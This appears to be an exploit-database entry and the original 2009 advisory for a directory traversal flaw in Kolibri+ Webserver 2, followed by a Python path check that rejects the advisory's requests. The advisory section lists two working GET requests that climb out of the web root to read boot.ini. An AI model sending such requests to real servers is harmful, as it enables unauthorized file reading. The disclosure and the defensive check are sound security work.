Vendor: Kolibri+ Webserver 2.0
By: Usman Saeed
CVSS: 7.5 (HIGH)
Directory Traversal
CWE: 22
Product Name: Kolibri+ Webserver 2.0
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE: N/A
CPE: a:kolibri_webserver:kolibri_webserver_2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Kolibri+ Webserver 2, Directory Traversal Vulnerability

A directory traversal vulnerability in Kolibri+ Webserver 2 allows an attacker to read arbitrary files on the server by sending a specially crafted HTTP request containing directory traversal sequences (e.g. '../').

Mitigation:

Upgrade to the latest version of Kolibri+ Webserver 2 or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

#############################################################################################
#
#   Name    :   Kolibri+ Webserver 2 , Directory Traversal Vulnerability
#   Author  :   Usman Saeed
#   Company :   Xc0re Security Research Group
#   Date    :   06/09/09
#   Homepage :  http://www.xc0re.net
#
#############################################################################################


[*] Download Page :
http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol


[*] Attack type : Remote


[*] Patch Status : Unpatched



[*] Exploitation :


          [Directory Traversal]

GET /../../../../../../../../../boot.ini HTTP/1.0
GET /../../../../../../../../boot.ini HTTP/1.0

# milw0rm.com [2009-09-11]
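
A path check that would refuse both requests listed above, added here as an illustration; it is not code from the advisory or from Kolibri+. The document root `C:\kolibri\htdocs` and the two benign request lines are constructed, and the check goes slightly beyond the advisory by normalizing percent-encoded and backslash separators before counting `..` segments.

```python
from pathlib import PureWindowsPath
from urllib.parse import unquote

DOCROOT = r"C:\kolibri\htdocs"  # assumed document root, not from the advisory

class TraversalError(ValueError):
    """The request target would resolve outside the document root."""

def resolve(docroot, request_target):
    """Map a request target to a path under docroot, or raise TraversalError."""
    raw = request_target.split("?", 1)[0].split("#", 1)[0]
    # Decode once and unify separators so encoded or backslash forms of
    # ".." are judged the same way as the literal "../" in the advisory.
    decoded = unquote(raw).replace("\\", "/")
    if "\x00" in decoded or not decoded.startswith("/"):
        raise TraversalError("malformed request target")
    kept = []
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not kept:  # nothing left to pop: the path leaves docroot
                raise TraversalError("climbs above document root")
            kept.pop()
        elif ":" in seg:  # drive letter or alternate data stream
            raise TraversalError("drive or stream specifier in path")
        else:
            kept.append(seg)
    return PureWindowsPath(docroot).joinpath(*kept)

def audit(request_lines, docroot=DOCROOT):
    """Return (request line, resolved path or None, verdict) for each line."""
    results = []
    for line in request_lines:
        target = line.split()[1]
        try:
            results.append((line, str(resolve(docroot, target)), "ok"))
        except TraversalError as exc:
            results.append((line, None, str(exc)))
    return results

SAMPLE = [
    "GET /../../../../../../../../../boot.ini HTTP/1.0",  # from the advisory
    "GET /../../../../../../../../boot.ini HTTP/1.0",     # from the advisory
    "GET /index.html HTTP/1.0",                           # constructed, benign
    "GET /docs/../index.html HTTP/1.0",                   # constructed, benign
]

if __name__ == "__main__":
    for line, path, verdict in audit(SAMPLE):
        print(f"{verdict:30} {path or '-':40} {line}")
```

The depth counter rejects a request as soon as a `..` segment has nothing left to pop, so a `..` that stays inside the document root still resolves normally.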